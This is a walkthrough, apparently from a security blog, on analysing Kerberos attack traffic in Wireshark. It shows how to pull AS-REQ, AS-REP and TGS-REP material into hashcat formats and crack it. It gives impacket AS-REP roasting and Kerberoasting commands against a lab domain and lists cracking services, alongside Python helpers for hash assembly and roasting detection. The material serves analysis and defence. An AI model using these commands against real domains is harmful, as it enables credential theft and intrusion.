?:hashcat

Attack Traffic Analysis

Kerberos AS-REQ Pre-Auth - $krb5pa

Kerberos pre-authentication stage traffic. The KDC's reply to the first AS-REQ reveals the account state:

  • Username exists and is enabled: KRB5KDC_ERR_PREAUTH_REQUIRED
  • Username exists but is disabled: KRB5KDC_ERR_CLIENT_REVOKED, NT Status: STATUS_ACCOUNT_DISABLED
  • Username does not exist: KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN

To crack a Kerberos AS-REQ Pre-Auth hash, first confirm the etype (encryption type), extract the cipher (the hash) from the AS-REQ packet, extract the username and realm (domain name) from the AS-REP packet, and assemble them in the following format:

# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>

Filter Kerberos AS-REQ traffic:

# Wireshark Filter PA Data (Pre-Authentication Data)
_ws.col.info == "AS-REQ"

Extract the cipher from the AS-REQ packet:

as-req
    pvno: 5
    msg-type: krb-as-req (10)
    padata: 2 items
        PA-DATA pA-ENC-TIMESTAMP
            padata-type: pA-ENC-TIMESTAMP (2)
                padata-value: 3041a003020112a23a043828b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
                    etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)
                    cipher: 28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
        PA-DATA pA-PAC-REQUEST
            padata-type: pA-PAC-REQUEST (128)
                padata-value: 3005a0030101ff
                    include-pac: True
    req-body

Extract the username and realm from the AS-REP packet:

as-rep
    pvno: 5
    msg-type: krb-as-rep (11)
    padata: 1 item
    crealm: NPC.COM
    cname
        name-type: kRB5-NT-PRINCIPAL (1)
        cname-string: 1 item
            CNameString: three
    ticket
        tkt-vno: 5
        realm: NPC.COM
        sname
            name-type: kRB5-NT-SRV-INST (2)
            sname-string: 2 items
                SNameString: krbtgt
                SNameString: NPC.COM
        enc-part
            etype: eTYPE-ARCFOUR-HMAC-MD5 (23)
            kvno: 2
            cipher […]: 6bf7e6fc3f91d70c3e839c8c4ceec3e8fe3be842e51f25b15937a37eb4573e6b8cf635947f216c4b43cf5671dca5208284a0f02a788fdd2df65e4bf4a2b8521713b2b458cc106457eb80375b371e837cc5b006f03d3712e0cc9a587825ba3add0db387a419869dc230f2199caa52376f9
    enc-part

Assemble into a crackable hash format:

# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>
[etype] 18
[username] three
[realm] NPC.COM
[cipher] 28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
# Crack with Hashcat
$krb5pa$18$three$NPC.COM$28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
-----
hashcat -m 19900 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt
-----
hashcat -m 19900 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$krb5pa$18$three$NPC.COM$28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08:Hello33
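The manual assembly above can be automated. This is an added example, not code from the original post: it DER-decodes the PA-ENC-TIMESTAMP padata-value shown in the AS-REQ dump (EncryptedData ::= SEQUENCE { etype [0], kvno [1] OPTIONAL, cipher [2] }), recovers the etype and cipher, builds the hashcat line, and flags the weak RC4/DES etypes an analyst should report. The username and realm are passed in from the AS-REP, as in the walkthrough; the hex constant is copied from the dump above.

```python
# Constructed from the padata-value hex shown in the AS-REQ dump (etype 18, 56-byte cipher).
PADATA_VALUE_HEX = (
    "3041a003020112a23a0438"
    "28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566e"
    "d1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08"
)
WEAK_ETYPES = {1: "des-cbc-crc", 3: "des-cbc-md5", 23: "rc4-hmac"}  # 17/18 are AES
HASHCAT_MODES = {17: 19800, 18: 19900, 23: 7500}


def _read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; returns (tag, value, position after it).
    Handles short-form and long-form lengths, which is all PA-ENC-TIMESTAMP needs."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_pa_enc_timestamp(hexval):
    """Decode the padata-value (EncryptedData) and return (etype, cipher hex)."""
    tag, body, _ = _read_tlv(bytes.fromhex(hexval), 0)
    if tag != 0x30:
        raise ValueError("padata-value is not a DER SEQUENCE")
    fields, pos = {}, 0
    while pos < len(body):
        ctx_tag, inner, pos = _read_tlv(body, pos)   # context tag [n] wraps the real type
        _, value, _ = _read_tlv(inner, 0)
        fields[ctx_tag & 0x1F] = value
    etype = int.from_bytes(fields[0], "big", signed=True)
    return etype, fields[2].hex()


def assemble_krb5pa(etype, username, realm, cipher_hex, salt=None):
    """$krb5pa$17|18$user$realm$cipher (19800/19900) or $krb5pa$23$user$realm$salt$cipher (7500)."""
    if etype in (17, 18):
        return f"$krb5pa${etype}${username}${realm}${cipher_hex}"
    if etype == 23:
        if salt is None:
            raise ValueError("etype 23 (mode 7500) needs the salt field")
        return f"$krb5pa$23${username}${realm}${salt}${cipher_hex}"
    raise ValueError(f"unsupported etype {etype}")


def review_preauth(padata_hex, username, realm, salt=None):
    """Analyst helper: returns (hashcat line, hashcat mode, weak-etype name or None)."""
    etype, cipher = parse_pa_enc_timestamp(padata_hex)
    line = assemble_krb5pa(etype, username, realm, cipher, salt)
    return line, HASHCAT_MODES[etype], WEAK_ETYPES.get(etype)
```

A non-None third value from review_preauth means the client negotiated RC4 or DES for pre-auth, which is the condition worth hunting for in a domain that should be AES-only.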

Kerberos AS-REP - $krb5asrep

To crack a Kerberos AS-REP hash, first confirm the etype (encryption type), extract the cipher (the hash), username and realm (domain name) from the AS-REP packet, and assemble them in the following format (etype=23 shown as the example):

# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]

Filter Kerberos AS-REP traffic:

# Wireshark Filter
_ws.col.info == "AS-REP"

Extract the cipher from the AS-REP packet:

Assemble into a crackable hash format:

# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]
[etype] 23
[username] three
[realm] NPC.COM
[hash] e71508e45fbb3289bd82066a83a713cac97f506ae47c9ecaaa64d157d34b2ff4ccabe9c2e713b64849db62acd57c3bec7e91f01633d6087305ab09bea29718956333e362bddc0a882880205e8aad984889559c2fcc6772508718a15e3f84093bd7c5c67b04a3412860cc8f05961e292407388d5aae3ca211c6b2441df6397f1ec0410f5803094dbd6daa7fe79e6a4e44d7292c4b9f40197e91c4e14fd6aa44c019b97637690af15a91c86260824c3759a035431a2135b6c8f6b44069901274cc8db557ba8b9cec7795c9ec4174611d9fe98b6bc2b8bb3ced4b3d8dbea8b481ade4216ba11f1b8c5ba25d5411cc8a082d21f5
# Crack with Hashcat
$krb5asrep$23$three@NPC.COM:e71508e45fbb3289bd82066a83a713ca$c97f506ae47c9ecaaa64d157d34b2ff4ccabe9c2e713b64849db62acd57c3bec7e91f01633d6087305ab09bea29718956333e362bddc0a882880205e8aad984889559c2fcc6772508718a15e3f84093bd7c5c67b04a3412860cc8f05961e292407388d5aae3ca211c6b2441df6397f1ec0410f5803094dbd6daa7fe79e6a4e44d7292c4b9f40197e91c4e14fd6aa44c019b97637690af15a91c86260824c3759a035431a2135b6c8f6b44069901274cc8db557ba8b9cec7795c9ec4174611d9fe98b6bc2b8bb3ced4b3d8dbea8b481ade4216ba11f1b8c5ba25d5411cc8a082d21f5
-----
hashcat -m 18200 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

AS-REP Roasting attack

Use impacket to obtain the login session key from the AS-REP response, which is encrypted with the user's hash:

python GetNPUsers.py -dc-ip 192.168.111.146 -usersfile users.txt npc/
-----
$krb5asrep$23$three@NPC:87697a72bc4eab52bde95f886db2a205$ad364d2ba23564547bea9387beb75e95a3a11db11a555154dea9307956b96e538b8b4b7cc822da450707c2ba51f7a6e124c8a668628a3ed60d38d40b44be89f279927f34e2de5ca3623f0bde2b45f3d9775a27816f5b49ded100cd6686a9ce191b3d503b516b11b8cec6a965c98cd5fb85c17ad812b26fa16ff719729a77432dc4df8903534bb37e09258dc91c41454425ed8d85cd4884fb9b23128eef8c9bc3d95f308f7fa1a13de2a587a5e57f0215144d62121de7c61cb625bcbc6cf387faa053a16fb16ecb1fc6f0652fc3d14ca03879edfa954c3508421299286105

Crack with Hashcat:

# Crack with Hashcat
hashcat -m 18200 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

When an enumerated username does not exist, the KRB Error is KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN; an AS-REP packet is only returned for a successful request. The corresponding AS-REP Roasting attack traffic is as follows:
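Seen from the KDC side, the two traffic patterns described above (a burst of KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN replies during username enumeration, then an AS-REP issued to a client that never went through KRB5KDC_ERR_PREAUTH_REQUIRED) are what a detection rule can key on. This is an added example, not code from the original post; the event records are constructed and the field layout (source IP, client name, KDC reply) is an assumption about how one would normalise Kerberos logs or pcap summaries.

```python
from collections import defaultdict

# Constructed KDC event records (not real logs): (source_ip, client_name, reply) per AS exchange.
# reply is the KRB-ERROR code, or "AS-REP:<etype>" when the KDC issued a ticket.
EVENTS = [
    ("10.0.0.5", "alice", "KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN"),
    ("10.0.0.5", "bob",   "KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN"),
    ("10.0.0.5", "carol", "KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN"),
    ("10.0.0.5", "dave",  "KRB5KDC_ERR_CLIENT_REVOKED"),
    ("10.0.0.5", "three", "AS-REP:23"),                    # ticket with no pre-auth round trip, RC4
    ("10.0.0.9", "three", "KRB5KDC_ERR_PREAUTH_REQUIRED"),
    ("10.0.0.9", "three", "AS-REP:18"),                    # normal login: pre-auth first, then AES
]

UNKNOWN = "KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN"
PREAUTH_REQ = "KRB5KDC_ERR_PREAUTH_REQUIRED"


def detect_asrep_roasting(events, enum_threshold=3):
    """Return {source_ip: [finding, ...]} for sources that look like enumeration or roasting.

    Heuristics: (1) >= enum_threshold distinct unknown principals from one source;
    (2) an AS-REP to a client name for which that source never received PREAUTH_REQUIRED,
        i.e. the account has pre-authentication disabled. etype 23 replies are called out
        because RC4 AS-REP material is what mode 18200 cracks offline."""
    by_src = defaultdict(list)
    for src, cname, reply in events:
        by_src[src].append((cname, reply))
    findings = defaultdict(list)
    for src, seq in by_src.items():
        unknown = {c for c, r in seq if r == UNKNOWN}
        if len(unknown) >= enum_threshold:
            findings[src].append(f"username enumeration: {len(unknown)} unknown principals")
        preauth_seen = set()
        for cname, reply in seq:
            if reply == PREAUTH_REQ:
                preauth_seen.add(cname)
            elif reply.startswith("AS-REP:") and cname not in preauth_seen:
                etype = int(reply.split(":", 1)[1])
                strength = "RC4, crackable offline" if etype == 23 else "AES"
                findings[src].append(f"AS-REP for {cname} without pre-auth (etype {etype}, {strength})")
    return dict(findings)
```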

Kerberos TGS-REP - $krb5tgs

To crack a Kerberos TGS-REP hash, first confirm the etype (encryption type), extract the cipher (the hash), username, realm (domain name) and SPN (service principal name) from the TGS-REP packet, and assemble them in the following format (etype=23 shown as the example):

# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]

Filter Kerberos TGS-REP traffic:

# Wireshark Filter
_ws.col.info == "TGS-REP"

Extract the SPN and cipher from the TGS-REP packet:

Assemble into a crackable hash format:

# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]
[etype] 23
[username] three
[realm] NPC.COM
[spn] npc.com/three
[hash] 
# Crack with Hashcat
$krb5tgs$23$*three$NPC.COM$npc.com/three*$7e991b6110f0b716bc0d8cdb55baba2b$...
-----
hashcat -m 13100 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

Kerberoasting attack

Use impacket to query the SPNs registered under domain user accounts and request a service ticket (ST) for the specified SPN:

python GetUserSPNs.py npc.com/three:Hello33 -dc-ip 192.168.111.146 -request
Impacket v0.12.0.dev1+20230909.154612.3beeda7 - Copyright 2023 Fortra

ServicePrincipalName  Name   MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------  -----  --------  --------------------------  --------------------------  ----------
HTTP/npc.com          three            2024-11-01 18:06:59.474634  2024-11-04 09:13:45.119428

[-] CCache file is not found. Skipping...
$krb5tgs$23$*three$NPC.COM$npc.com/three*$7e991b6110f0b716bc0d8cdb55baba2b$...

Crack with Hashcat:

# Crack with Hashcat
hashcat -a 0 -m 13100 hashes.txt ~/HackTools/Dict/rockyou.txt

The corresponding attack traffic is shown below; pay particular attention to the SNameString fields:

Appendix

Tools

Offline cracking tools:

# Offline hash cracker
https://hashcat.net/hashcat/
https://github.com/openwall/john

Online cracking tools:

# Online hash cracker
https://www.cmd5.org/
https://www.somd5.com/
https://www.onlinehashcrack.com/
https://crackstation.net/
https://crack.sh/
https://passwordrecovery.io/
https://md5decrypt.net/en/Sha256/
https://hashes.com/en/decrypt/hash

# NetNTLMv1 online cracker
https://ntlmv1.com/

Rainbow tables:

# LM + NTLM hashes and corresponding plaintext passwords:
https://openwall.info/wiki/_media/john/pw-fake-nt.gz 3107
https://openwall.info/wiki/_media/john/pw-fake-nt100k.gz 100k

Further Reading
